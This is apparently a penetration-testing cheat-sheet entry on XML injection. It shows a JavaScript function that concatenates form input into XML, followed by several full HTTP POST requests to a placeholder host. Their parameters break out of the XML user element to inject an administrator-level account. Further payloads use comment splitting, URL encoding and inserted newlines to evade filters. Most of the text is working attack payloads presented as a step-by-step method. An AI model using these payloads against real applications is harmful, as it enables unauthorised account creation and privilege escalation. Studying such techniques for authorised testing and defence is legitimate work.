XML

Insert XML payloads in each parameter until you receive an XML error such as <test>

XML declaration allowed only at the start of the document

Now search for ways to build the XML structure to use to your advantage such as JS files and other payloads etc.

function WSregister__old() {
var name = document.getElementById("name").value;
var username = document.getElementById("user").value;
var password = document.getElementById("password").value;
var xml = '<?xml version="1.0" encoding="utf-8"?> ';
xml += '<user> ';
xml += ' <rule>2</rule> ';
xml += ' <name>' + name + '</name> ';
xml += ' <username>' + username + '</username> ';
xml += ' <password>' + password + '</password> ';
xml += '</user> ';
$.ajax({

Capture a request and modify the parameter to inject a new user with "rule 1" and see if you can elevate your account.

POST /add_new.php HTTP/1.1
Host: Vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 109
Connection: close
name=user1&user=user1</username></user><user><rule>1</rule><name>admin</name><username>admin&password=password

If the application strips some of the characters consider a double injection and URL encoding the payload. Or try submitting it via the application instead

name: </name></user><user><rule>1<!--
username: --></rule><name>admin1</name><username>admin1
password: pentest

Full Payload

POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
name=%3C%2Fname%3E%3C%2Fuser%3E%3Cuser%3E%3Crule%3E1%3C!--&user=--%3E%3C%2Frule%3E%3Cname%3Ea%3C%2Fname%3E%3Cusername%3Ea&password=pentest

Further Filtering

The check may be case-insensitive, and furthermore it seems that spaces and tabs may be ignored between the tag name and the close tag character but, if we inject a new line it is not filtered!

Try adding new lines to see if they still work:

POST /add_new.php HTTP/1.1
Host: vulnerable.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: vulnerable.host
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 84
Connection: close
name=</name></user><user><rule
>1<!--&user=--></rule
><username>l33t&password=1337